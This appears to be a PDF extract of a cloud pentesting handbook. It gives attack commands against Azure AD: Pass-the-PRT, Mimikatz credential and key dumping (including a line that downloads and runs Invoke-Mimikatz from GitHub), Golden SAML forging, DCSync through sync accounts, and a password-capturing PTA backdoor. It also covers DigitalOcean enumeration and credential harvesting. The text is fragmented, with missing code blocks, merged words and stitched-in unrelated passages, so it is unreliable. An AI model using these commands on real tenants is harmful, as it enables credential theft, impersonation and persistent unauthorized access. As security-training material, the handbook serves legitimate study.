AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVb
iSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
Or using roadrecon:
Then you can use roadtoken to get a new PRT (run in the tool from a
process of the user to attack):
.\ROADtoken.exe <nonce>
As oneliner:
{ % code overflow="wrap" %}
Then you can use the generated cookie to generate tokens to login using
Azure AD Graph or Microsoft Graph:
# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
Attack - Mimikatz
This won't work post August 2021 fixes as only the user can get his PRT (a
local admin cannot access other users PRTs)
mimikatz.exe
Privilege::debug
Sekurlsa::cloudap
# Or in powershell
iex (New-Object
Net.Webclient).downloadstring("https://raw.githubusercontent.co
m/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug"
"sekurlsa::cloudap"'
Copy the part labeled Prt and save it.\ Extract also the session key or
“ProofOfPosessionKey�? which you can see highlighted below. This is
encrypted and we will need to use our DPAPI masterkeys to decrypt it.
If you don’t see any PRT data it could be that you don’t have any PRTs
because your device isn’t Azure AD joined or it could be you are running
an old version of Windows 10.
Token::elevate
Dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE]
/unprotect
Now you want to copy both the Context value:
Finally you can use all this info to generate PRT cookies:
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
HttpOnly: Set to True (checked)
The rest should be the defaults. Make sure you can refresh the page and the
cookie doesn’t disappear, if it does, you may have made a mistake and have
to go through the process again. If it doesn’t, you should be good.
References
This post was mostly extracted from
https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-
prt/
In this scenario and after grabbing all the info needed for a Pass the PRT
attack:
Username
Tenant ID
PRT
Security context
Derived Key
It's possible to request P2P certificate for the user with the tool
PrtToCert:
{ % code overflow="wrap" %}
The certificates will last the same as the PRT. To use the certificate you can
use the python tool AzureADJoinedMachinePTC that will authenticate
to the remote machine, run PSEXEC and open a CMD on the victim
machine. This will allow us to use Mimikatz again to get the PRT of
another user.
For each method, at least the user synchronization is done and an account
with the name MSOL_<installationidentifier> is created on the on-
prem AD.
Get-ADSyncConnector
PHS
phs-password-hash-sync.md
PTA
pta-pass-through-authentication.md
Seamless SSO
seamless-sso.md
Federation
federation.md
You can federate your on-premises environment with Azure AD and use
this federation for authentication and authorization. This sign-in method
ensures that all user authentication occurs on-premises. This method
allows administrators to implement more rigorous levels of access control.
Federation with AD FS and PingFederate is available.
Bsiacally, in Federation, all authentication occurs in the on-prem
environment and the user experiences SSO across all the trusted
environments. Therefore, users can access cloud applications by using their
on-prem credentials.
User or Client
Identity Provider (IdP):
Service Provider (SP)
1. First the user tries to access an application (also known as the SP i.e.
Service Provider), that might be an AWS console, vSphere web client,
etc. Depending on the implementation, the client may go directly to the
IdP first, and skip the first step in this diagram.
2. The application then detects the IdP (i.e. Identity Provider, could be
AD FS, Okta, etc.) to authenticate the user, generates a SAML
AuthnRequest and redirects the client to the IdP.
3. The IdP authenticates the user, creates a SAMLResponse and posts
it to the SP via the user.
4. SP checks the SAMLResponse and logs the user in. The SP must
have a trust relationship with the IdP. The user can now use the
service.
https://book.hacktricks.xyz/pentesting-web/saml-attacks
Pivoting
AD FS is a claims-based identity model.
"..claimsaresimplystatements(forexample,name,identity,group), made
about users, that are used primarily for authorizing access to claims-
based applications located anywhere on the Internet."
Claims for a user are written inside the SAML tokens and are then
signed to provide confidentiality by the IdP.
A user is identified by ImmutableID. It is globally unique and stored in
Azure AD.
TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe
user and/or can be derived from the GUID of the user.
More info in https://learn.microsoft.com/en-us/windows-
server/identity/ad-fs/technical-reference/the-role-of-claims
Golden SAML
From the previous schema the most interesting part is the third one, were
the IdP generates a SAMLResponse authorising the user to sig in.
Depending on the specific IdP implementation, the response may be either
signed or encrypted by the private key of the IdP. This way, the SP can
verify that the SAMLResponse was indeed created by the trusted IdP.
Similar to a golden ticket attack, with the key that signs the object which
holds the user’s identity and permissions (KRBTGT for golden ticket and
token-signing private key for golden SAML), we can then forge such an
“authentication object�? (TGT or SAMLResponse) and impersonate
any user to gain unauthorized access to the SP.
For the private key you’ll need access to the AD FS account, and from its
personal store you’ll need to export the private key (export can be done
with tools like mimikatz). For the other requirements you can import the
powershell snapin Microsoft.Adfs.Powershell and use it as follows (you
have to be running as the ADFS user):
# IdP Name
(Get-ADFSProperties).Identifier.AbsoluteUri
# Role Name
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
{ % code overflow="wrap" %}
# Apply session for AWS cli
python .shimit.py -idp
http://adfs.lab.local/adfs/services/trust -pk key_file -c
cert_file -u domainadmin -n [email protected] -r ADFS-admin -r
ADFS-monitor -id 123456789012
# idp - Identity Provider URL e.g.
http://server.domain.com/adfs/services/trust
# pk - Private key file full path (pem format)
# c - Certificate file full path (pem format)
# u - User and domain name e.g. domain\username (use \ or
quotes in *nix)
# n - Session name in AWS
# r - Desired roles in AWS. Supports Multiple roles, the first
one specified will be assumed.
# id - AWS account id e.g. 123456789012
All users and a hash of the password hashes are syncronized from the on-
prem to Azure AD. However, clear-text passwords or the original hashes
aren't sent to Azure AD.\ Moreover, Built-in security groups (like domain
admins...) are not synced to Azure AD.
PHS is required for features like Identity Protection and AAD Domain
Services.
Pivoting
When PHS is configured some privileged accounts are automatically
created:
# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties
* | select SamAccountName,Description | fl
#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match
"Sync_"}
AzureAD -> On-prem
# Using the creds of MSOL_* account, you can run DCSync against
the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt
/domain:domain.local /dc:dc.domain.local"'
It's also possible to modify the passwords of only cloud users (even if
that's unexpected)
# To reset the password of cloud only user, we need their
CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select
UserPrincipalName,ObjectID
# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-
b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
Seamless SSO
It's possible to use Seamless SSO with PTA, which is vulnerable to other
abuses. Check it in:
seamless-sso.md
References
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-
phs
https://aadinternals.com/post/on-prem_admin/
Authentication flow
1. To login the user is redirected to Azure AD, where he sends the
username and password
2. The credentials are encrypted and set in a queue in Azure AD
3. The on-prem authentication agent gathers the credentials from the
queue and decrypts them. This agent is called "Pass-through
authentication agent" or PTA agent.
4. The agent validates the creds against the on-prem AD and sends the
response back to Azure AD which, if the response is positive,
completes the login of the user.
If an attacker compromises the PTA he can see the all credentials from the
queue (in clear-text).\ He can also validate any credentials to the
AzureAD (similar attack to Skeleton key).
Install-AADIntPTASpy
It's also possible to see the clear-text passwords sent to PTA agent using
the following cmdlet on the machine where the previous backdoor was
installed:
Get-AADIntPTASpyLog -DecodePasswords
process
Seamless SSO
It's possible to use Seamless SSO with PTA, which is vulnerable to other
abuses. Check it in:
seamless-sso.md
References
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-
to-connect-pta
https://aadinternals.com/post/on-prem_admin/#pass-through-
authentication
Basically Azure AD Seamless SSO signs users in when they are on a on-
prem domain joined PC.
It's supported by both PHS (Password Hash Sync) and PTA (Pass-
through Authentication).
Desktop SSO is using Kerberos for authentication. When configured,
Azure AD Connect creates a computer account called
AZUREADSSOACC in on-prem AD. The password of the
AZUREADSSOACC account is sent as plain-text to Azure AD during the
configuration.
The Kerberos tickets are encrypted using the NTHash (MD4) of the
password and Azure AD is using the sent password to decrypt the tickets.
azuread-sso.com
Moreover, you could also accept that application with your user as a way to
maintain access over it.
{ % code overflow="wrap" %}
$passwd = ConvertTo-SecureString
"J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential("311bf843-cc8b-459c-
be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -
Tenant e12984235-1035-452e-bd32-ab4d72639a
{ % code overflow="wrap" %}
New-AADIntADFSSelfSignedCertificates
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
Dynamic groups can have Azure RBAC roles assigned to them, but it's
not possible to add AzureAD roles to dynamic groups.
Example
Rule example: (user.otherMails -any (_ -contains "tester")) -
Rule description: Any Guest user whose secondary email contains the
string 'tester' will be added to the group
{ % code overflow="wrap" %}
# Login
$password = ConvertTo-SecureString 'password' -
AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@
somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId
<tenant_id_of_attacked_domain>
Concepts such as hierarchy, access and other basic concepts are explained
in:
do-basic-information.md
Basic Enumeration
SSRF
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
Projects
To get a list of the projects and resources running on each of them from the
CLI check:
do-projects.md
Whoami
Another key difference between the two platforms is the pricing structure.
DigitalOcean's pricing is generally more straightforward and easier to
understand than AWS, with a range of pricing plans that are based on the
number of droplets and other resources used. AWS, on the other hand, has a
more complex pricing structure that is based on a variety of factors,
including the type and amount of resources used. This can make it more
difficult to predict costs when using AWS.
Hierarchy
User
A user is what you expect, a user. He can create Teams and be a member
of different teams.
Team
A team is a group of users. When a user creates a team he has the role
owner on that team and he initially sets up the billing info. Other user
can then be invited to the team.
Inside the team there might be several projects. A project is just a set of
services running. It can be used to separate different infra stages, like
prod, staging, dev...
Project
As explained, a project is just a container for all the services (droplets,
spaces, databases, kubernetes...) running together inside of it.\ A Digital
Ocean project is very similar to a GCP project without IAM.
Permissions
Team
Basically all members of a team have access to the DO resources in all the
projects created within the team (with more or less privileges).
Roles
Each user inside a team can have one of the following three roles inside of
it:
Owner and member can list the users and check their roles (biller
cannot).
Access
Username + password (MFA)
As in most of the platforms, in order to access to the GUI you can use a set
of valid username and password to access the cloud resources. Once
logged in you can see all the teams you are part of in
https://cloud.digitalocean.com/account/profile. And you can see all your
activity in https://cloud.digitalocean.com/account/activity.
MFA can be enabled in a user and enforced for all the users in a team to
access the team.
API keys
In order to use the API, users can generate API keys. These will always
come with Read permissions but Write permission are optional.\ The API
keys look like this:
dop_v1_1946a92309d6240274519275875bb3cb03c1695f60d47eaa15329165
02361836
They are composed by a name, a keyid and a secret. An example could be:
Name: key-example
Keyid: DO00ZW4FABSGZHAABGFX
Secret: 2JJ0CcQZ56qeFzAJ5GFUeeR4Dckarsh6EQSLm87MKlM
OAuth Application
OAuth applications can be granted access over Digital Ocean.
This way, if you create a new droplet, the SSH key will be set on it and
you will be able to login via SSH without password (note that newly
uploaded SSH keys aren't set in already existent droplets for security
reasons).
Team logs
The logs of a team can be found in
https://cloud.digitalocean.com/account/security
References
https://docs.digitalocean.com/products/teams/how-to/manage-
membership/
Apps
Container Registry
Databases
Droplets
Functions
Images
Kubernetes (DOKS)
Networking
Projects
Spaces
Volumes
You can run code directly from github, gitlab, docker hub, DO container
registry (or a sample app).
When defining an env var you can set it as encrypted. The only way to
retreive its value is executing commands inside the host runnig the app.
Enumeration
That will give you a shell, and just executing env you will be able to see
all the env vars (including the ones defined as encrypted).
Connection
# Using doctl
doctl registry login
Enumeration
# Get creds to access the registry from the API
doctl registry docker-config
# List
doctl registry repository list-v2
Connections details
When creating a database you can select to configure it accessible from a
public network, or just from inside a VPC. Moreover, it request you to
whitelist IPs that can access it (your IPv4 can be one).
The host, port, dbname, username, and password are shown in the
console. You can even download the AD certificate to connect securely.
{ % code overflow="wrap" %}
sql -h db-postgresql-ams3-90864-do-user-2700959-
0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
Enumeration
# Databse clusters
doctl databases list
# Auth
doctl databases get <db-id> # This shows the URL with
CREDENTIALS to access
doctl databases connection <db-id> # Another way to egt
credentials
doctl databases user list <db-id> # Get all usernames and
passwords
# Backups
doctl databases backups <db-id> # List backups of DB
# Pools
doctl databases pool list <db-id> # List pools of DB
You can select from common OS, to applications already running (such as
WordPress, cPanel, Laravel...), or even upload and use your own images.
Snapshots can be used to create new Droplets with the same configuration
as the original Droplet, or to restore a Droplet to the state it was in when the
snapshot was taken. Snapshots are stored on DigitalOcean's object storage
service, and they are incremental, meaning that only the changes since the
last snapshot are stored. This makes them efficient to use and cost-effective
to store.
On the other hand, a backup is a complete copy of a Droplet, including the
operating system, installed applications, files, and data, as well as the
Droplet's settings and metadata. Backups are typically performed on a
regular schedule, and they capture the entire state of a Droplet at a specific
point in time.
Authentication
For authentication it's possible to enable SSH through username and
password (password defined when the droplet is created). Or select one or
more of the uploaded SSH keys.
Firewall
By default droplets are created WITHOUT A FIREWALL (not like in
oder clouds such as AWS or GCP). So if you want DO to protect the ports
of the droplet (VM), you need to create it and attach it.
do-networking.md
Enumeration
# VMs
doctl compute droplet list # IPs will appear here
doctl compute droplet backups <droplet-id>
doctl compute droplet snapshots <droplet-id>
doctl compute droplet neighbors <droplet-id> # Get network
neighbors
doctl compute droplet actions <droplet-id> # Get droplet
actions
# VM interesting actions
doctl compute droplet-action password-reset <droplet-id> # New
password is emailed to the user
doctl compute droplet-action enable-ipv6 <droplet-id>
doctl compute droplet-action power-on <droplet-id>
doctl compute droplet-action disable-backups <droplet-id>
# SSH
doctl compute ssh <droplet-id> # This will just run SSH
doctl compute ssh-key list
doctl compute ssh-key import <key-name> --public-key-file
/path/to/key.pub
# Certificates
doctl compute certificate list
# Snapshots
doctl compute snapshot list
RCE
With access to the console it's possible to get a shell inside the droplet
accessing the URL:
https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/
It's also possible to launch a recovery console to run commands inside the
host accessing a recovery console in
https://cloud.digitalocean.com/droplets/<droplet-id>/console (but
in this case you will need to know the root password).
In DO, to create a function first you need to create a namespace which will
be grouping functions.\ Inside the namespace you can then create a
function.
Triggers
The way to trigger a function via REST API (always enabled, it's the
method the cli uses) is by triggering a request with an authentication token
like:
curl -X POST "https://faas-lon1-
129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-
4040-1230-2183764b7c23/actions/functionname?
blocking=true&result=true"
-H "Content-Type: application/json" \
-H "Authorization: Basic
MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djN
ZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWn
VhYVdrTFg="
To see how is the doctl cli tool getting this token (so you can replicate it),
the following command shows the complete network trace:
Enumeration
# Namespace
doctl serverless namespaces list
# Logs of executions
doctl serverless activations list
doctl serverless activations get <activation-id> # Get all the
info about execution
doctl serverless activations logs <activation-id> # get only
the logs of execution
doctl serverless activations result <activation-id> # get only
the response result of execution
# I couldn't find any way to get the env variables form the CLI
When you create a new Droplet on DigitalOcean, you can choose an Image
to use as the basis for the Droplet. This will automatically install the
operating system and any pre-installed applications on the new Droplet, so
you can start using it right away. Images can also be used to create
snapshots and backups of your Droplets, so you can easily create new
Droplets from the same configuration in the future.
Enumeration
Connection
# Use a kubeconfig file that you can download from the console
kubectl --kubeconfig=/<pathtodirectory>/k8s-1-25-4-do-0-ams3-
1670939911166-kubeconfig.yaml get nodes
Enumeration
# Get clusters
doctl kubernetes cluster list
Domains
Reserverd IPs
Load Balancers
VPC
doctl vpcs list
Firewall
By default droplets are created WITHOUT A FIREWALL (not like in
oder clouds such as AWS or GCP). So if you want DO to protect the ports
of the droplet (VM), you need to create it and attach it.
do-basic-information.md
Enumeration
It's possible to enumerate all the projects a user have access to and all
the resources that are running inside a project very easily:
Access
Spaces can be public (anyone can access them from the Internet) or private
(only authorised users). To access the files from a private space outside of
the Control Panel, we need to generate an access key and secret. These are
a pair of random tokens that serve as a username and password to grant
access to your Space.
Even if the space is public, files inside of it can be private (you will be
able to access them only with credentials).
However, even if the file is private, from the console it's possible to share a
file with a link such as
https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-
Algorithm=AWS4-HMAC-SHA256&X-Amz-
Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_reque
st&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-
SignedHeaders=host&X-Amz-
Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115d
Enumeration
# Unauthenticated
## Note how the region is specified in the endpoint
aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-
sign-request s3://uniqbucketname
# Authenticated
## Configure spaces keys as AWS credentials
aws configure
AWS Access Key ID [None]: <spaces_key>
AWS Secret Access Key [None]: <Secret>
Default region name [None]:
Default output format [None]:
Enumeration